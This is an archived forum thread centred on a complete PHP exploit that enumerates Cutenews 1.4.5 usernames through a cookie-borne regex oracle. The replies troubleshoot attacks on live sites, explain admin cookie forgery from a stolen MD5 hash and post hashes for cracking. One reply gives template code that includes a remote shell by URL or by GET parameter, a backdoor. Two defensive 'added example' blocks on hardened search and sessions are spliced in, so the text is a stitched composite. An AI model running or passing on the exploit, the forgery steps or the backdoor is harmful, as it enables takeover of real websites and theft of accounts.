IT Security and Insecurity Portal
Cutenews <= 1.4.5 usernames fetching exploit

Posted: Sun Dec 23, 2007 10:48 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Code:
<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// Cutenews <= 1.4.5 usernames fetching exploit
// Version 1.1
// Written by Janek Vind "waraxe"
// http://www.waraxe.us
// 25. dec 2007
// Estonia, Tartu
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_COOKIE, so no log fear
// 3. Pretesting saves time if Cutenews is not vulnerable
//
// Version 1.1 -> pattern recognize improved
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$target = 'http://localhost/cutenews.1.4.5/search.php';
$level = 1; // User level needed, admin is 1
$outfile = './cute_log.txt';// Log file
//=====================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
if(($level < 1) || ($level > 4))
{
die('Specified level is invalid!');
}
$levels = array(1=>'admin',2=>'editor',3=>'journalist',4=>'commenter');
$levelname = $levels[$level];
$start_time = time();
$users_cnt = array();
$users = array();
$requests = 0;
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
if(!isset($_REQUEST['wtf-is-cli']))
{
echo "<html><head><title>Attention!</title></head>\n";
echo "<body><br /><br /><center>\n";
echo "<h1>Warning!</h1>\n";
echo "This exploit is meant to be used as php CLI script!<br />\n";
echo "More information:<br />\n";
echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
echo "Still, you can try to run it from webserver.<br />\n";
echo "Just press the button below and prepare for long waiting<br />\n";
echo "And learn to use php CLI next time, please ...<br />\n";
echo "<form method=\"get\">\n";
echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
echo "</form>\n";
echo "</center></body></html>\n";
exit;
}
else
{
// Let's try to maximize our chances without CLI
set_time_limit(0);
}
}
//=====================================================================
add_logline("-------------------------------------------------------");
add_logline("Cutenews usernames fetching started");
add_logline("Target: $target");
add_logline("Reglevel: $levelname");
pre_test();
fetch_users();
$fcnt = count($users);
add_logline("Fetched $fcnt usernames with reglevel '$levelname'\n");
xecho("\nFetched $fcnt usernames with reglevel '$levelname'\n", 1);
foreach($users as $username)
{
add_logline($username);
xecho($username, 1);
}
$run_time = time() - $start_time;
xecho("\nTotal time spent: $run_time seconds", 1);
xecho("HTTP requests made: $requests\n", 1);
xecho("Questions and feedback - http://www.waraxe.us/forums.html", 1);
xecho("See ya! :)", 1);
exit;
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function fetch_users()
{
global $users_cnt, $level;
$maxlen = 15;
$pieces = array(' ' => $users_cnt[$level]);
for($i = 0; $i < $maxlen; $i ++)
{
$cntx = count($pieces);
$arr = array();
foreach($pieces as $known => $count)
{
$arr2 = reveal_next_char($known, $count);
$arr = array_merge($arr, $arr2);
}
$pieces = $arr;
}
}
///////////////////////////////////////////////////////////////////
function reveal_next_char($known, $count)
{
global $users_cnt, $users, $level;
$known = trim($known);
$charset = 'abcdefghijklmnopqrstuvwxyz0123456789._-';
$chars = strlen($charset);
$out = array();
$rl = "[$level]";
$arr = array("$charset" => $count);
$found_final = 0;
while(1)
{
$found = 0;
$arr2 = array();
foreach($arr as $subset => $scnt)
{
$curr_len = intval(floor(strlen($subset) / 2));
// Testing first half
$fhalf = substr($subset, 0, $curr_len);
$un = "^$known([$fhalf])";
xecho("Testing $un");
$matches = make_query($un, $rl);
if($matches > 0)
{
$found += $matches;
xecho("Found $matches match(es)");
if( strlen($fhalf) == 1)
{
// Exact match?
if(test_exact_match("$known$fhalf"))
{
if($matches > 1)
{
$out["$known$fhalf"] = $matches - 1;
}
}
else
{
$out["$known$fhalf"] = $matches;
}
$found_final += $matches;
}
else
{
$arr2[$fhalf] = $matches;
}
}
if($matches < $scnt)
{
// Testing second half
$shalf = substr($subset, $curr_len);
$un = "^$known([$shalf])";
xecho("Testing $un");
$matches = make_query($un, $rl);
if($matches > 0)
{
$found += $matches;
xecho("Found $matches match(es)");
if( strlen($shalf) == 1)
{
if(test_exact_match("$known$shalf"))
{
if($matches > 1)
{
$out["$known$fhalf"] = $matches - 1;
}
}
else
{
$out["$known$shalf"] = $matches;
}
$found_final += $matches;
}
else
{
$arr2[$shalf] = $matches;
}
}
}
}
$arr = $arr2;
if( $found_final >= $count )
{
break;
}
}
return $out;
}
////////////////////////////////////////////////////////////////////////
function test_exact_match($un)
{
global $level;
$rl = "[$level]";
$test = "^$un$";
xecho("Testing for full match $un");
$matches = make_query($test, $rl);
if($matches > 0)
{
xecho("Full username found: $un");
$GLOBALS['users'][]= $un;
return true;
}
xecho("Not full match: $un");
return false;
}
///////////////////////////////////////////////////////////////////////
function pre_test()
{
global $users_cnt;
$un = "^[\.A-z0-9_\-]{1,15}\$";
// Target URL valid?
xecho("Validating target URL");
if(strpos(make_get($GLOBALS['target']), 'search_in_archives') === false)
{
die('Target URL not valid!');
}
xecho("URL is valid");
$rl = "[1-4]";
$cnt_all = make_query($un, $rl);
if($cnt_all < 1)
{
die('Pretest failed - no users at all?');
}
else
{
xecho("Total $cnt_all user(s) detected:", 1);
add_logline("Total $cnt_all user account(s)\n");
}
$rl = "[1]";
$cnt_admins = make_query($un, $rl);
if($cnt_admins < 1)
{
die('Pretest failed - no admins at all?');
}
else
{
xecho("$cnt_admins admin(s)", 1);
add_logline("$cnt_admins admin account(s)");
}
$rl = "[2]";
$cnt_editors = make_query($un, $rl);
xecho("$cnt_editors editor(s)", 1);
add_logline("$cnt_editors editor account(s)");
$rl = "[3]";
$cnt_journalists = make_query($un, $rl);
xecho("$cnt_journalists journalist(s)", 1);
add_logline("$cnt_journalists journalist account(s)");
$rl = "[4]";
$cnt_commenters = make_query($un, $rl);
xecho("$cnt_commenters commenter(s)", 1);
add_logline("$cnt_commenters commenter account(s)\n");
if( $cnt_all === ($cnt_admins + $cnt_editors + $cnt_journalists + $cnt_commenters) )
{
xecho("Pretesting passed successfully - target is vulnerable!", 1);
}
else
{
die('Fetched userscounts does not match - fatal exit!');
}
$users_cnt[1] = $cnt_admins;
$users_cnt[2] = $cnt_editors;
$users_cnt[3] = $cnt_journalists;
$users_cnt[4] = $cnt_commenters;
}
///////////////////////////////////////////////////////////////////////
function make_query($username, $reglevel = '')
{
global $target;
$max_retries = 10;
$cookie = "dosearch=yes;files_arch[]=./data/users.db.php;title=$username";
if(!empty($reglevel))
{
$cookie .= ";user=$reglevel";
}
for($retry = 0; $retry < $max_retries + 1; $retry ++)
{
if($retry > 0)
{
xecho("Request failed!\n");
xecho("Sleeping $retry seconds\n");
sleep($retry);
xecho("Awake ...\n");
xecho("Retry #$retry\n");
}
$buff = make_get($target, $cookie, '', true);
$ret = preg_match('/\[[0-9]{1,6}\]:/',$buff,$hits);
if($ret > 0)
{
$ret = intval(substr($hits[0], 1));
if($ret > -1)
{
return $ret;
}
}
}
die('Fatal error - server down?');
}
///////////////////////////////////////////////////////////////////////
function make_get($url, $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
if(!empty($cookie))
{
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
}
if(!empty($referer))
{
curl_setopt($ch, CURLOPT_REFERER, $referer);
}
if($headers === TRUE)
{
curl_setopt($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt($ch, CURLOPT_HEADER, FALSE);
}
$fc = curl_exec($ch);
curl_close($ch);
$GLOBALS['requests'] ++;
return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_logline($line)
{
global $outfile;
$line .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $line);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
function xecho($line, $both = 0)
{
if($GLOBALS['cli'])
{
echo "$line\n";
}
elseif($both)
{
$line = nl2br(htmlspecialchars($line));
echo "$line<br />\n";
}
}
//////////////////////////////////////////////////////////////////////
?>

Feedback is welcome

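The script above works because search.php takes the list of files to search (files_arch[]) and the pattern (title) from the request cookie and answers with a match count, so a regex on ./data/users.db.php becomes a one-bit oracle per request. The following is an added example, not Cutenews code and not part of waraxe's post: a search handler shaped the way the script needs it next to a hardened one. The parameter names dosearch, files_arch, title and user are the ones the exploit sends; the function bodies and the archive-file naming (".news.arch") are assumptions for illustration.

```php
<?php
// Added example (not Cutenews code): weak vs hardened search handler.

// Weak: every parameter comes from $_REQUEST, which with the default
// variables_order also covers $_COOKIE, so the file list and the regex are
// client-controlled. With files_arch[]=./data/users.db.php and a regex in
// title, the returned count leaks one fact per request about the user DB.
function weak_search(array $request): int
{
    $count = 0;
    foreach ((array) ($request['files_arch'] ?? []) as $file) {
        foreach (file($file) ?: [] as $line) {
            // user text is dropped straight into the regex
            if (preg_match('/' . ($request['title'] ?? '') . '/i', $line)) {
                $count++;
            }
        }
    }
    return $count;
}

// Hardened: input only from the POST body, file names resolved against an
// allow-list built from the archive directory, and the search term used as
// a literal string rather than a pattern.
function hardened_search(array $post, string $archive_dir): int
{
    if (!isset($post['dosearch'], $post['title']) || !is_array($post['files_arch'] ?? null)) {
        return 0;
    }
    // Allow-list keyed by bare file name (assumed suffix ".news.arch"), so any
    // directory component the client supplies is ignored.
    $allowed = [];
    foreach (glob($archive_dir . '/*.news.arch') ?: [] as $path) {
        $allowed[basename($path)] = $path;
    }
    $needle = preg_quote($post['title'], '/');   // metacharacters lose their meaning
    $count = 0;
    foreach ($post['files_arch'] as $name) {
        if (!is_string($name) || !isset($allowed[basename($name)])) {
            continue;   // users.db.php, ../ paths and so on are simply not listed
        }
        foreach (file($allowed[basename($name)]) ?: [] as $line) {
            if (preg_match('/' . $needle . '/i', $line)) {
                $count++;
            }
        }
    }
    return $count;
}

// Constructed request as the script would send it: the weak handler would
// happily open the path, the hardened one returns 0 because the name is
// not in the allow-list.
$probe = [
    'dosearch'   => 'yes',
    'files_arch' => ['./data/users.db.php'],
    'title'      => '^a[a-m]',
];
$result = hardened_search($probe, __DIR__ . '/data/archives');   // 0
```

Two points worth noting for defenders: the exploit's "no log fear" remark holds because the parameters travel in the Cookie header, which a default web-server access log does not record, so an allow-list at the application layer is the control, not log review; and even the hardened handler still reports counts, which is acceptable only because the archive files are public news, never credential stores.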
Posted: Sat Jan 19, 2008 8:30 pm
PoisonedV
Regular user
Joined: Jan 19, 2008
Posts: 18

Hey, the script is awesome and definitely helpful when trying to find out the admin. However, when I did a search for level 3 accounts, it went for a little bit and then stopped going. Any ideas?

Posted: Sat Jan 19, 2008 8:37 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

PoisonedV wrote: | Hey, the script is awesome and definitely helpful when trying to find out the admin. However, when I did a search for level 3 accounts, it went for a little bit and then stopped going. Any ideas? |
That's odd, the script is supposed to work correctly in various conditions ...
Can you provide all output from start to the stopping moment - just strip sensitive info before posting it. This should help to figure out the cause of the problem ...

Posted: Sat Jan 19, 2008 9:00 pm
PoisonedV
Regular user
Joined: Jan 19, 2008
Posts: 18

Here's the log file. Doesn't reveal much.
-------------------------------------------------------
Cutenews usernames fetching started
Target: http://xxxxx/cutenews/search.php
Reglevel: journalist
Total 12 user account(s)
1 admin account(s)
1 editor account(s)
10 journalist account(s)
0 commenter account(s)
And that's the end of the logfile. In the DOS command window, it started off fine:
but then it started acting weird and stopped.
I've tried this multiple times and the same thing happens.

Posted: Sat Jan 19, 2008 9:18 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Hmm, seems like some kind of bug in the exploit ... maybe.
Still - you can fetch the admin's username and password md5 hash and then log in as admin. With admin privileges all usernames can be seen and manipulated anyway.
I can't fix this bug without testing with a real target, and right now I don't have much time either.

Posted: Sat Jan 19, 2008 9:25 pm
PoisonedV
Regular user
Joined: Jan 19, 2008
Posts: 18

waraxe wrote: | Hmm, seems like some kind of bug in the exploit ... maybe.
Still - you can fetch the admin's username and password md5 hash and then log in as admin. With admin privileges all usernames can be seen and manipulated anyway.
I can't fix this bug without testing with a real target, and right now I don't have much time either. |
Yeah, it's fine. I'm asking around for some people to crack the md5 hash of the admin for me, just thought maybe this could speed things up.

Posted: Sat Jan 19, 2008 9:45 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

PoisonedV wrote: | waraxe wrote: | Hmm, seems like some kind of bug in the exploit ... maybe.
Still - you can fetch the admin's username and password md5 hash and then log in as admin. With admin privileges all usernames can be seen and manipulated anyway.
I can't fix this bug without testing with a real target, and right now I don't have much time either. |
Yeah, it's fine. I'm asking around for some people to crack the md5 hash of the admin for me, just thought maybe this could speed things up. |
You don't need to crack the hash to get admin access to a cutenews installation. You just need the right cookie with the hash - that's all. Cookie forgery, it may be called.

Posted: Sat Jan 19, 2008 10:18 pm
PoisonedV
Regular user
Joined: Jan 19, 2008
Posts: 18

Thanks for that tip. Now I can see all users even without using the script. I still want to get that md5 hash cracked though. If you have time, it's fad9894adff22d0cb828ce2eb4029ba1 and 04b4fe759be109523596029186c6eb58,
but if not it's fine.

Posted: Thu Jan 24, 2008 12:05 am
Elewyn
Beginner
Joined: Feb 03, 2006
Posts: 3

Can you explain how to craft a cutenews cookie?

Posted: Thu Jan 24, 2008 12:11 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Elewyn wrote: | Can you explain how to craft a cutenews cookie? |
Cookie must be like this:
Code: |
username=admin;md5_password=1b3396f4609f652f7179bd05423c5374;
|
Use Firefox and a cookie editor add-on and create a new cookie with the username and password hash, as seen above, and with the domain pointing to the target website. That's all.
And by the way - when you have cutenews admin privileges, then it's easy to get php level access - through template editing. And if safe_mode=off, then the next step can be exec(), popen(), system() and/or other shell access functions in php.
Basically - most of the cutenews-powered websites are just waiting for trouble ...

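The cookie format quoted above puts the stored MD5 itself on the wire and accepts it as proof of identity, which is why the hash never needs cracking: whoever reads it out of users.db.php, a proxy log or a capture is admin. As an added example (not Cutenews code and not part of waraxe's post), here is that check next to the usual replacement, a random server-side session id issued only after password_verify() succeeds. $users and $sessions are plain arrays standing in for the user and session stores; that, and the field names, are assumptions.

```php
<?php
// Added example (not Cutenews code): hash-in-cookie check vs session ids.

// Weak: the cookie value is compared directly against the stored hash, so
// the stored hash is a reusable bearer credential.
function weak_is_admin(array $cookie, array $users): bool
{
    $u = $cookie['username'] ?? '';
    return isset($users[$u]) && $users[$u]['md5'] === ($cookie['md5_password'] ?? '');
}

// Hardened login: verify the password against a salted password_hash() value,
// then mint a 256-bit random session id and record it server-side with an
// expiry. The id is the only thing that reaches the cookie.
function login(string $user, string $password, array $users, array &$sessions): ?string
{
    if (!isset($users[$user]) || !password_verify($password, $users[$user]['hash'])) {
        return null;
    }
    $sid = bin2hex(random_bytes(32));
    $sessions[$sid] = ['user' => $user, 'expires' => time() + 3600];
    return $sid;
}

// Resolve the cookie back to a user; unknown or expired ids are dropped.
function current_user(array $cookie, array &$sessions): ?string
{
    $sid = $cookie['sid'] ?? '';
    if (!isset($sessions[$sid]) || $sessions[$sid]['expires'] < time()) {
        unset($sessions[$sid]);
        return null;
    }
    return $sessions[$sid]['user'];
}

// Cookie attributes that keep the id off clear-text HTTP and away from
// page scripts (options-array form of setcookie(), PHP 7.3+).
function send_session_cookie(string $sid): void
{
    setcookie('sid', $sid, [
        'expires'  => time() + 3600,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
}

// Constructed sample data: one admin whose hash was made by password_hash().
$users    = ['admin' => ['hash' => password_hash('correct horse', PASSWORD_DEFAULT)]];
$sessions = [];
$sid = login('admin', 'correct horse', $users, $sessions);   // 64 hex chars
$bad = login('admin', 'wrong password', $users, $sessions);  // null
$who = current_user(['sid' => $sid], $sessions);             // "admin"
$none = current_user(['sid' => 'forged'], $sessions);        // null
```

With this layout a leaked users.db.php still has to be cracked before it is useful, a leaked session id dies at its expiry, and logging out is a server-side unset() rather than hoping the browser forgets a hash.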
Posted: Thu Jan 24, 2008 12:47 am
Elewyn
Beginner
Joined: Feb 03, 2006
Posts: 3

Sorry, I didn't see what you posted; problem already solved.

Posted: Wed Jun 04, 2008 4:40 pm
mixman
Regular user
Joined: Jun 03, 2008
Posts: 11
Location: Estonia,Tallinn

I am trying to fetch the admin login name from one site which uses CuteNews 1.4.5 (at least it says so at the bottom of that page).
But when I try to get it I get this:
Quote: | Fatal errror - server down? |
But the server is 100% up.
Quote: | //=====================================================================
$target = 'http://www.*****.org/cutenews/search.php';
$level = 1; // User level needed, admin is 1
$outfile = './cute_log.txt';// Log file
//=====================================================================
|
Can anyone help me out with this?
[[edited by waraxe - no real URL-s!]]

Posted: Wed Jun 04, 2008 9:12 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

This website is probably patched, so the exploit does not work.

Posted: Thu Jun 05, 2008 7:32 pm
Final
Beginner
Joined: Jun 05, 2008
Posts: 3

Hello, first of all, thank you very much for this exploit and the friendly support. These two scripts worked perfectly for me.
I have a question concerning this, however:
waraxe wrote: | And by the way - when you have cutenews admin privileges, then it's easy to get php level access - through template editing. And if safe_mode=off, then the next step can be exec(), popen(), system() and/or other shell access functions in php. |
Would you mind explaining how exactly this is possible? I have administrator access to the CuteNews and can create or edit templates. Now I would like to load my own shell up. Is it possible to do this...?
Thanks in advance,
~Final

Posted: Fri Jun 06, 2008 8:27 pm
mixman
Regular user
Joined: Jun 03, 2008
Posts: 11
Location: Estonia,Tallinn

Final wrote: | Hello, first of all, thank you very much for this exploit and the friendly support. These two scripts worked perfectly for me.
I have a question concerning this, however:
waraxe wrote: | And by the way - when you have cutenews admin privileges, then it's easy to get php level access - through template editing. And if safe_mode=off, then the next step can be exec(), popen(), system() and/or other shell access functions in php. |
Would you mind explaining how exactly this is possible? I have administrator access to the CuteNews and can create or edit templates. Now I would like to load my own shell up. Is it possible to do this...?
Thanks in advance,
....~Final |
It seems that you can upload a shell by inserting this in the active template:
Code: | <?php include('url to your shell here'); ?> |
But don't ask me where this shell goes, I am trying to figure this out myself also...
Perhaps the template file dir???
..../cutenews/data/shell.php
but I guess you can't open a file there due to permissions.
Edit:
Another way should be this:
Insert this into the active template:
Code: | if(isset($_GET['myshell'])) { include($_GET['myshell']); } |
Later go to:
Code: | http://site.com/cutenews/index.php?myshell=<URL TO SHELL HERE> |
Just some ideas to test, I am very new to this, so better wait for the experienced guys' opinion...
